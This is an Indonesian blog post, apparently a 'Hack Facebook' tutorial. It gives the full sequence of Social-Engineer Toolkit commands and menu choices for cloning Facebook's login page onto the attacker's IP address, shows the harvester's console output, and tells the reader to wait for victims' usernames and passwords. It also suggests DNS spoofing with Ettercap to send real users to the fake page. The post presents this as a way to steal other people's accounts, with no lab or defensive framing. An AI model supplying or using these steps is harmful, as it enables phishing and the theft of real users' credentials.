Pasti pada penasaran bagaimana Hack Facebook, kali ini saya akan share tricks tentang SET atau Social-Engineering Toolkit, ini sejenis fake login yang alamatnya adalah ip address kita misalnya 192.168.1.34.
Pertama buka terminal :
1. masukkan perintah
cd /pentest/exploits/set
2. masukkan perintah :
./set
3. pilih Social-Engineering Attacks dengan cara tekan angka 1 (enter)
4. pilih Website Attack Vectors tekan 2 (enter)
5. pilih Credential Harvester Attack Method tekan 3 (enter)
6. pilih Web Templates tekan 1 (enter)
7. IP address for the POST back in Harvester/Tabnabbing: 192.168.1.34 (IP address kita)
jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook,gmail,google,twitter dan Java required contohnya.
8. tinggal pilih templatenya, karena ini tutorial hack facebook, pilih 4
[*] Cloning the website: http://www.facebook.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
9. Press {return} to continue. tekan enter.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
kalau sudah muncul kalimat seperti yang di atas berarti S.E.T telah berjalan jangan di tutup terminalnya tunggu aja sampai ada orang yang login di fake Facebook yang udah kita buat tadi.
username dan password akan muncul di bawah kalimat tersebut.
Agar orang-orang kalau membuka facebook di alihkan ke fake Facebook gunakan DSN spoofing. Belum tau cara DNS spoofing baca artikel DNS Spoofing Dengan Ettercap
No comments:
Post a Comment